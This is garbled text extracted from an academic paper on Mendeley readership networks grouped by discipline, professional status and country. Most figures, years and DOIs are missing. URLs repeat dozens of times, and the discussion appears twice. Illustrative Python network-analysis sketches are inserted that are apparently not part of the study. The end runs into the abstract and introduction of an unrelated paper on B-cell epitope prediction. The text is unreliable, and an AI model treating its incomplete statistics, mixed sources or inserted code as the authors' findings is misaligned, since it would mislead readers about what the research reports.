_map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= 
http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= 
Figure caption: Affiliations, mainly in the social sciences and the humanities (group ). This figure can be web-started at http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= .

The figure visualizes the entire network of sub-disciplinary affiliations.
It shows that the core set is occupied by readers who characterize themselves as "miscellaneous" readers from different disciplines, such as "biology miscellaneous", "environmental science miscellaneous", etc. The social sciences ("miscellaneous") are one among these reading communities. The humanities, however, are placed more in the periphery. The algorithmically generated distinctions among the four groups (using Blondel et al.) cannot be clearly distinguished in this projection, because the domains overlap when projected onto a two-dimensional plane. The figure is therefore based on the mapping of VOSviewer in this case. This figure can be web-started from http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= .
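To make the algorithmic grouping concrete, the following minimal sketch (not taken from the study; all node names and edge weights are invented for illustration) shows how a weighted co-reading network between sub-disciplinary affiliations can be partitioned with the Louvain method of Blondel et al. using networkx, and why a two-dimensional layout of the same graph can blur the boundaries between the detected groups even though the partition itself is well defined.

# Illustrative sketch only: hypothetical sub-disciplines and co-reading
# weights (e.g., numbers of shared readers), not data from the study.
import networkx as nx
from networkx.algorithms import community

edges = [
    ("biology miscellaneous", "environmental science miscellaneous", 12),
    ("biology miscellaneous", "medicine miscellaneous", 9),
    ("social sciences miscellaneous", "psychology miscellaneous", 7),
    ("social sciences miscellaneous", "economics", 4),
    ("history", "philosophy", 5),
    ("history", "social sciences miscellaneous", 2),
    ("philosophy", "psychology miscellaneous", 1),
    ("medicine miscellaneous", "environmental science miscellaneous", 6),
]

G = nx.Graph()
G.add_weighted_edges_from(edges)

# Louvain community detection (Blondel et al.) on the weighted graph.
groups = community.louvain_communities(G, weight="weight", seed=42)
for i, grp in enumerate(groups, start=1):
    print(f"group {i}: {sorted(grp)}")

# A 2-D layout analogous to the VOSviewer projection: nodes from different
# communities may land close together, so the groups can overlap visually.
pos = nx.spring_layout(G, weight="weight", seed=42)

The design point of the sketch is that community membership is computed on the full weighted graph, whereas the map shown in the figure is only a two-dimensional projection of that graph, which is why the four groups overlap on the plane.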
Figure: Affiliations in the bio-medical sciences (group in yellow) and affiliations in the natural sciences and engineering (group in pink).
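The networks shown in these figures (and in the status and country networks below) are co-readership, or "co-bookmarking", networks: two affiliations, status groups, or countries are linked when readers from both have bookmarked the same publication. As a minimal illustrative sketch, assuming per-publication lists of reader groups (the paper does not publish code, and all names and counts below are invented), such a weighted co-occurrence network could be assembled as follows in Python with networkx:

# Minimal sketch (not from the paper): build a weighted co-readership network
# in which two reader groups are linked whenever they bookmarked the same
# publication. Input data, group names, and paper IDs are purely illustrative.
from itertools import combinations

import networkx as nx

# Hypothetical input: for each bookmarked publication, the reader groups
# (here: status groups) that saved it to a Mendeley library.
readers_per_paper = {
    "paper-1": {"Student PhD", "Student Master", "Post Doc"},
    "paper-2": {"Student PhD", "Assistant Professor"},
    "paper-3": {"Post Doc", "Student PhD", "Librarian"},
}

G = nx.Graph()
for groups in readers_per_paper.values():
    for a, b in combinations(sorted(groups), 2):
        # The edge weight counts how many publications both groups bookmarked.
        if G.has_edge(a, b):
            G[a][b]["weight"] += 1
        else:
            G.add_edge(a, b, weight=1)

print(G.number_of_nodes(), "groups,", G.number_of_edges(), "co-reading links")

The same construction applies unchanged when the nodes are affiliations or countries instead of status groups.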
Status hierarchy

Mendeley users have to assign one of the predefined status groups to themselves. Some of these professional status groups seem redundant, such as "student PhD", "student post-graduate", and "doctoral student". Any merging or regrouping of these status groups, however, would be a rather arbitrary choice (Haustein & Larivière, a). We therefore analyze the Mendeley reader counts in the status groups as provided by Mendeley and discuss these issues in the light of the results.

Figure shows that a common interest in papers is mainly shared among PhD students, master students, and postdocs. Other studies confirm the dominant position of these groups (Zahedi, Costas & Wouters, ). In this study, researchers at academic institutions follow, but less so researchers at non-academic institutions. Lecturers and senior lecturers are less involved than professors, and librarians hardly participate in this network. Note that this network is not modularized at all (Q = . , cf. Table ); all groups are fully connected to all other groups.

Figure: Four communities (colors) of affiliations among co-bookmarking readers.

Figure: Network of co-readers in terms of professional status.

Table: Eigenvector centralities and absolute number of reader counts (n) of different status groups among networked Mendeley users (using the hubs & authorities routine in Pajek).

Status group | Eigenvector centrality | n
Student PhD | . | , ,
Student Master | . | , ,
Post Doc | . | , ,
Researcher at an academic institution | . | ,
Doctoral student | . | ,
Student bachelor | . | ,
Student post-graduate | . | ,
Assistant professor | . | ,
Researcher at a non-academic institution | . | ,
Full professor | . | ,
Associate professor | . | ,
Lecturer | . | ,
Librarian | . | ,
Senior lecturer | . | ,

Table shows the eigenvector centralities of the different status groups among networked Mendeley users (Bonacich, ). Groups with high eigenvector centrality (in this case, students) are more central because they share their interests in publications with many other groups, while recursively taking into account the (eigenvector) centrality of these other groups (De Nooy, Mrvar & Batagelj, ). However, the very high eigenvector centrality of students is probably to some extent due to the fact that students (especially PhD and master) and postdocs form by far the largest status groups. This is in agreement with previous studies, which also found that students and postdocs represent the largest user status groups at Mendeley (Bornmann & Haunschild, ; Mohammadi et al., ). Senior lecturers, the group with the lowest eigenvector centrality, seem to be interested in publications different from those of the other status groups. However, the eigenvector centrality is strongly influenced by the absolute number of reader counts: the Spearman rank correlation coefficient between eigenvector centrality and reader counts is . .
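To make these two statistics concrete, the following is a minimal sketch (in Python with networkx and SciPy, not code from the paper) that computes eigenvector centralities on a small invented weighted co-readership graph and correlates them with group sizes. The paper's centralities come from Pajek's hubs-and-authorities routine; networkx's eigenvector centrality is used here only as an illustrative stand-in, and every number in the snippet is made up.

# Sketch of the two statistics discussed above, on an invented weighted
# co-readership graph between status groups. All values are illustrative.
import networkx as nx
from scipy.stats import spearmanr

G = nx.Graph()
G.add_weighted_edges_from([
    ("Student PhD", "Student Master", 120),
    ("Student PhD", "Post Doc", 95),
    ("Student Master", "Post Doc", 60),
    ("Student PhD", "Assistant Professor", 30),
    ("Post Doc", "Librarian", 4),
])

# Hypothetical absolute reader counts per status group.
reader_counts = {
    "Student PhD": 500_000,
    "Student Master": 300_000,
    "Post Doc": 150_000,
    "Assistant Professor": 60_000,
    "Librarian": 5_000,
}

# Eigenvector centrality on the weighted graph (stand-in for Pajek's routine).
centrality = nx.eigenvector_centrality(G, weight="weight", max_iter=1000)

# Spearman rank correlation between centrality and the size of each group.
groups = sorted(centrality)
rho, p = spearmanr(
    [centrality[g] for g in groups],
    [reader_counts[g] for g in groups],
)
print({g: round(c, 3) for g, c in centrality.items()})
print("Spearman rho:", round(rho, 2))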
Note that the status indications may differ among nations. For example, the ranks of "assistant professor" and "lecturer" are virtually non-existent in some countries. On the other side, ranks such as "reader" (sometimes different from "lecturer") and "habilitand" (a status in German-speaking countries for those working on a "habilitation", a second, PhD-like qualification which provides teaching rights at the university) are not covered by the Mendeley classification system. The data suggest that Mendeley readers in the career stages "reader" and "habilitand" assign the status "assistant professor" to themselves, as this is the most highly populated of the professorship categories. Furthermore, some status groups seem redundant, e.g., "doctoral student", "student post-graduate", and "student PhD"; however, most Mendeley readers who are working on a doctoral thesis identify themselves as "student PhD".

Decomposition in terms of nations

Among the + countries in the world, countries appear in the readership of Mendeley users who actively bookmarked records in this database. These countries are all connected, with an average degree of . , which means that on average each node is linked to ( . %) other nodes in the network of nodes. The density of the network is . (cf. Table ). The eigenvector centralities of the countries vary only between . and . . This small variation of eigenvector centrality between countries is probably due to the high connectivity of the countries, although there is a large variation of reader counts, from (Liberia) to , (USA).

Figure: Group of nations. The unlabeled circles next to the UK and the US indicate the Netherlands and Spain, respectively. The unlabeled circle between Russia and Hong Kong is the Czech Republic. A version with all labels visible can be web-started from http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= .

The community-finding algorithm distinguishes four groups. However, the modularity among these four groups is low (Q = . , cf. Table ) because of cross-group network connections (a small illustrative sketch of such network statistics follows the list):

1. A group of nations that are core to the scientific enterprise, including Russia and China as well as two thirds of the OECD countries (Fig. ). The OECD member states Chile, Greece, Iceland, Mexico, New Zealand, Norway, Portugal, Slovak Republic, Slovenia, and Turkey are not part of this group; they are part of the second group.
2. The largest group of nations, centered around Brazil and India (Fig. ).
3. A group of ten small nations with Niger and Nigeria as the central core (not shown).
4. The smallest group, with only Guinea and Guinea-Bissau (not shown).
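As referenced above, here is a small self-contained sketch of the kind of statistics reported for the country network: average degree, density, a community grouping, and its modularity Q. The edge list is invented, and networkx's greedy modularity optimization is used only as a stand-in for the community-finding algorithm applied in the paper; none of the printed values correspond to the paper's results.

# Sketch of the network statistics reported for the country network: average
# degree, density, and a modularity-based grouping. Edge weights are invented.
import networkx as nx
from networkx.algorithms.community import greedy_modularity_communities, modularity

G = nx.Graph()
G.add_weighted_edges_from([
    ("USA", "UK", 900), ("USA", "Germany", 700), ("UK", "Germany", 650),
    ("USA", "Brazil", 200), ("Brazil", "India", 300), ("Brazil", "Portugal", 120),
    ("India", "Malaysia", 110), ("Niger", "Nigeria", 15),
    ("Guinea", "Guinea-Bissau", 3),
])

n = G.number_of_nodes()
avg_degree = sum(d for _, d in G.degree()) / n
density = nx.density(G)

# Greedy modularity optimization as an illustrative community-finding step.
communities = greedy_modularity_communities(G, weight="weight")
q = modularity(G, communities, weight="weight")

print(f"{n} countries, average degree {avg_degree:.1f}, density {density:.2f}")
print(f"{len(communities)} communities, Q = {q:.2f}")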
Figure: Countries in the second group of nations.

Figures and show country groups and . A version of Fig. can be web-started at http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . As in the case of Fig. , one can run the mapping and clustering of the subsets in VOSviewer to obtain more details.

Discussion

Networks are one of the most important and popular methods for analyzing bibliometric data. In this study, we explored whether Mendeley data can also be successfully used as a data source for network analysis. Only a few attempts have been made up to now to analyze the rich Mendeley data using network-analysis techniques. It is a great advantage that the data can be retrieved for comprehensive publication sets using an API; thus, one can download readership data on a large scale, which is very suitable for network analyses.
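To illustrate the kind of API retrieval referred to here, the following hedged sketch requests readership statistics for a single DOI from the public Mendeley catalog API. The endpoint, query parameters, Accept header, and response field names are assumptions based on the commonly documented API and should be checked against the current documentation; the access token and DOI are placeholders.

# Hedged sketch of retrieving Mendeley readership statistics for one DOI via
# the public catalog API. Endpoint, parameters, and field names are assumed
# from the commonly documented API and may differ from the current version.
import requests

ACCESS_TOKEN = "YOUR_OAUTH2_TOKEN"   # placeholder; obtained via Mendeley's OAuth2 flow
DOI = "10.1234/example-doi"          # hypothetical DOI, for illustration only

response = requests.get(
    "https://api.mendeley.com/catalog",
    params={"doi": DOI, "view": "stats"},
    headers={
        "Authorization": f"Bearer {ACCESS_TOKEN}",
        "Accept": "application/vnd.mendeley-document.1+json",
    },
    timeout=30,
)
response.raise_for_status()

for record in response.json():  # the catalog endpoint returns a list of matches
    # Readership broken down by academic status and country, the breakdowns
    # underlying the status and country networks above (field names assumed).
    print(record.get("reader_count"))
    print(record.get("reader_count_by_academic_status"))
    print(record.get("reader_count_by_country"))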
discussion
networks are one of the most important and popular methods to analyze bibliometric data. in this study, we explored whether mendeley data can also be successfully used as a data source for network analysis. only a few attempts have been made up to now to analyze the rich mendeley data using network analysis techniques. it is a great advantage that the data can be retrieved for comprehensive publication sets using an api. thus, one can download readership data on a large scale, which is very suitable for network analyses. we encourage other researchers to use mendeley data for larger publication sets in order to inspect the usage structure of publications (gunn, ).
the mendeley readership networks were generated by using different types of user information: their ( ) disciplinary affiliation, ( ) professional status, and ( ) country. all three information sources can be used to produce meaningful network results.
in terms of disciplines, we first found four groups: ( ) biology, ( ) social science and humanities (including relevant computer science), ( ) bio-medical sciences, and ( ) natural science and engineering. in all four groups, the category with the addition "miscellaneous" prevails. probably, the readers who identify themselves with cross-disciplinary research interests are more inclined to generate these "bookmark couplings" than more narrowly specialized readers. the pronounced position of the social sciences and the humanities was not expected. some sub-disciplines, e.g., "judaism" and "catholicism", are disconnected from the other sub-disciplines.
the decomposition in terms of status hierarchies within the network makes clear that this hierarchy is inverted in mendeley. the lead among the users is taken by students working on theses. more than professionals, students have time to explore the literature beyond their specialization. lecturers and senior lecturers entertain a different reading pattern, given their primary tasks in education. librarians make use of mendeley (and scholarly literature) differently from researchers. students, who have the highest absolute number of reader counts, also have the highest eigenvector centrality in the network, which indicates that they have a strong bookmark coupling when compared with other status groups (e.g., lecturer or librarian). the calculated eigenvector centralities correlate strongly with the absolute number of observed reader counts.
the decomposition in terms of nations highlights the worldwide divide between developed and less-developed nations. a similar prevailing divide was recently also found in a portfolio analysis of journal literature by leydesdorff, heimeriks & rotolo (in press). more fine-grained delineations can partially be recognized as regional, but could not always be provided with an obvious interpretation.
the academic status information is provided by every mendeley user, and nearly every mendeley user provides (sub-)discipline information. surprisingly, the vast majority of mendeley readers assign the miscellaneous sub-discipline of their main discipline to themselves. only a minority of mendeley users seems to provide their location. this makes it more difficult to analyze the reader counts broken down by countries.
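as an illustration of the centrality computation discussed above, the following sketch (python with networkx and scipy; the coupling weights and reader counts are invented toy numbers, not the paper's data) builds a small weighted bookmark-coupling network of status groups, computes eigenvector centrality, and correlates it with the absolute reader counts.

```python
# minimal sketch with assumed toy data: eigenvector centrality of status groups
# in a weighted bookmark-coupling network, compared with absolute reader counts.
import networkx as nx
from scipy.stats import pearsonr

# hypothetical coupling weights: number of papers bookmarked by readers of both groups
coupling = {
    ("phd student", "master student"): 950,
    ("phd student", "postdoc"): 720,
    ("master student", "postdoc"): 410,
    ("phd student", "lecturer"): 300,
    ("lecturer", "senior lecturer"): 150,
    ("phd student", "librarian"): 60,
}
# hypothetical absolute reader counts per status group
reader_counts = {
    "phd student": 5000, "master student": 3500, "postdoc": 2200,
    "lecturer": 900, "senior lecturer": 400, "librarian": 150,
}

# build the weighted coupling graph
G = nx.Graph()
for (u, v), w in coupling.items():
    G.add_edge(u, v, weight=w)

# weighted eigenvector centrality of each status group in the coupling network
centrality = nx.eigenvector_centrality(G, weight="weight", max_iter=1000)

# correlate centrality with the absolute reader counts, as described in the text
groups = sorted(G.nodes())
r, _ = pearsonr([centrality[g] for g in groups], [reader_counts[g] for g in groups])
print({g: round(c, 3) for g, c in centrality.items()})
print(f"pearson correlation between centrality and reader counts: r = {r:.2f}")
```

with toy numbers of this shape, the group with the largest reader counts also ends up with the largest centrality, which mirrors the pattern reported for students in the text.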
some mendeley academic status groups seem redundant (e.g., doctoral student and student phd), while others seem to be tailored to the british (e.g., lecturer and senior lecturer) or the us system (e.g., assistant professor and associate professor). it is not clear to what extent mendeley users assign the precise sub-discipline, status, and location information to themselves and whether they update this information regularly. despite these shortcomings of the mendeley classification system and the quality of the information the users provide, the network analyses of mendeley reader counts from three different perspectives produced interesting insights into readership patterns. this shows that useful network analysis can be performed using mendeley readership counts.
conclusions
in this study, we analyzed mendeley readership data of a set of , , articles and , reviews with publication year to generate three different networks: ( ) the network based on disciplinary affiliations of mendeley readers contains four groups: (i) biology, (ii) social sciences and humanities (including relevant computer sciences), (iii) bio-medical sciences, and (iv) natural sciences and engineering. in all four groups, the category with the addition "miscellaneous" prevails. ( ) the network of co-readers in terms of professional status shows that mendeley is mainly shared among phd students, master's students, and postdocs. ( ) the country network focusses on global readership patterns: it identifies a group of nations that are core to the scientific enterprise, including two thirds of the oecd countries as well as russia and china.
acknowledgements
the bibliometric data used in this paper are from an in-house database developed and maintained by the max planck digital library (mpdl, munich) and derived from the science citation index expanded (sci-e), social sciences citation index (ssci), and arts and humanities citation index (ahci) provided by thomson reuters (philadelphia, pennsylvania, usa).
additional information and declarations
funding
the authors received no funding for this work.
competing interests
loet leydesdorff is an academic editor for peerj computer science.
author contributions
• robin haunschild conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• lutz bornmann conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper.
• loet leydesdorff analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper.
data availability
the following information was supplied regarding data availability: this paper was available on the arxiv in a previous version. arxiv: http://arxiv.org/abs/ .
references
blondel vd, guillaume jl, lambiotte r, lefebvre e. . fast unfolding of communities in large networks. journal of statistical mechanics: theory and experiment :p doi . / - / / /p .
bonacich p. . factoring and weighting approaches to status scores and clique identification. journal of mathematical sociology ( ): – doi . / x. . .
börner k, sanyal s, vespignani a. . network science. annual review of information science and technology ( ): – doi . /aris. . .
bornmann l. . do altmetrics point to the broader impact of research? an overview of benefits and disadvantages of altmetrics. journal of informetrics ( ): – doi . /j.joi. . . .
bornmann l. . alternative metrics in scientometrics: a meta-analysis of research into three altmetrics. scientometrics ( ): – doi . /s - - -y.
bornmann l, haunschild r. . which people use which scientific papers? an evaluation of data from f and mendeley. journal of informetrics ( ): – doi . /j.joi. . . .
de nooy w, mrvar a, batagelj v. . exploratory social network analysis with pajek. new york: cambridge university press.
gunn w. . mendeley: enabling and understanding scientific collaboration. information services and use ( ): – doi . /isu- .
haunschild r, bornmann l. . f prime: an analysis of discipline-specific reader data from mendeley [version ; referees: approved with reservations, not approved]. f research : doi . /f research. . .
haustein s, larivière v. a. mendeley as a source of readership by students and postdocs? evaluating article usage by academic status. in: proceedings of the iatul conferences. paper .
haustein s, larivière v. b. a multidimensional analysis of aslib proceedings - using everything but the impact factor. aslib journal of information management ( ): – doi . /ajim- - - .
jeng w, he dq, jiang jp. . user participation in an academic social networking service: a survey of open group users on mendeley. journal of the association for information science and technology ( ): – doi . /asi. .
kessler mm. . bibliographic coupling between scientific papers. american documentation ( ): – doi . /asi. .
kraker p, schlögl c, jack k, lindstaedt s. . visualization of co-readership patterns from an online reference management system. arxiv preprint. arxiv: . .
leydesdorff l. . science visualization and discursive knowledge. in: cronin b, sugimoto c, eds. beyond bibliometrics: harnessing multidimensional indicators of scholarly impact. cambridge: mit press, – .
leydesdorff l, heimeriks g, rotolo d. . journal portfolio analysis for countries, cities, and organizations: maps and comparisons. journal of the association for information science and technology, in press.
maflahi n, thelwall m. . when are readership counts as useful as citation counts? scopus versus mendeley for lis journals. journal of the association for information science and technology, in press.
martin b, nightingale p, rafols i. . response to the call for evidence to the independent review of the role of metrics in research assessment. available at https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= .
milojević s. . network analysis and indicators. in: ding y, rousseau r, wolfram d, eds. measuring scholarly impact. switzerland: springer international publishing, – doi . / - - - - .
mingers j, leydesdorff l. . a review of theory and practice in scientometrics. european journal of operational research ( ): – doi . /j.ejor. . . .
mohammadi e, thelwall m. . assessing the mendeley readership of social science and humanities research. in: gorraiz j, schiebel e, gumpenberger c, ho m, eds. proceedings of issi vienna: th international society of scientometrics and informetrics conference. vienna: austrian institute of technology gmbh, – .
mohammadi e, thelwall m. . mendeley readership altmetrics for the social sciences and humanities: research evaluation and knowledge flows. journal of the association for information science and technology ( ): – doi . /asi. .
mohammadi e, thelwall m, haustein s, larivière v. . who reads research articles? an altmetrics analysis of mendeley user categories. journal of the association for information science and technology ( ): – doi . /asi. .
sud p, thelwall m. . not all international collaboration is beneficial: the mendeley readership and citation impact of biochemical research collaboration. journal of the association for information science and technology, in press.
van eck jn, waltman l. . visualizing bibliometric networks. in: ding y, rousseau r, wolfram d, eds. measuring scholarly impact. switzerland: springer international publishing, – doi . / - - - - .
zahedi z, costas r, wouters p. . assessing the impact of publications saved by mendeley users: is there any different pattern among users? in: proceedings of the iatul conferences. paper . available at http://docs.lib.purdue.edu/iatul/ /altmetrics/ (accessed september ).
zahedi z, van eck nj. . visualizing readership activity of mendeley users using vosviewer. figshare doi . /m .figshare. .
https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /asi. http://dx.doi.org/ . /asi. http://dx.doi.org/ . / - - - - _ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. networks of reader and country status: an analysis of mendeley reader statistics introduction methods dataset used software and statistics results statistical parameters disciplinary affiliations status hierarchy decomposition in terms of nations discussion conclusions acknowledgements references submitted may accepted april published june corresponding author binti solihah, binti.solihah@mail.ugm.ac.id academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright solihah et al. distributed under creative commons cc-by . 
open access enhancement of conformational b-cell epitope prediction using clusmote binti solihah , , azhari azhari and aina musdholifah department of computer science and electronics, faculty of mathematics and natural sciences, universitas gadjah mada, yogyakarta, indonesia department of informatics engineering, universitas trisakti, grogol, jakarta barat, indonesia abstract background. a conformational b-cell epitope is one of the main components of vaccine design. it contains separate segments in its sequence, which are spatially close in the antigen chain. the availability of ag-ab complex data on the protein data bank allows for the development predictive methods. several epitope prediction models also have been developed, including learning-based methods. however, the performance of the model is still not optimum. the main problem in learning-based prediction models is class imbalance. methods. this study proposes clusmote, which is a combination of a cluster- based undersampling method and synthetic minority oversampling technique. the approach is used to generate other sample data to ensure that the dataset of the conformational epitope is balanced. the hierarchical dbscan algorithm is performed to identify the cluster in the majority class. some of the randomly selected data is taken from each cluster, considering the oversampling degree, and combined with the minority class data. the balance data is utilized as the training dataset to develop a conformational epitope prediction. furthermore, two binary classification methods, support vector machine and decision tree, are separately used to develop model prediction and to evaluate the performance of clusmote in predicting conformational b-cell epitope. the experiment is focused on determining the best parameter for optimal clusmote. two independent datasets are used to compare the proposed prediction model with state of the art methods. the first and the second datasets represent the general protein and the glycoprotein antigens respectively. result. the experimental result shows that clusmote decision tree outperformed the support vector machine in terms of auc and gmean as performance measurements. the mean auc of clusmote decision tree in the kringelum and the seppa test sets are . and . , respectively. this shows that clusmote decision tree is better than other methods in the general protein antigen, though comparable with seppa in the glycoprotein antigen. subjects bioinformatics, data mining and machine learning keywords cluster-based undersampling, smote, class imbalance, hybrid sampling, hierarchi- cal dbscan, vaccine design introduction a b-cell epitope is among the main components of peptide-based vaccines (andersen, nielsen & lund, ; zhang et al., ; ren et al., ). it can be utilized in how to cite this article solihah b, azhari a, musdholifah a. . enhancement of conformational b-cell epitope prediction using clus- mote. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:binti.solihah@mail.ugm.ac.id https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. 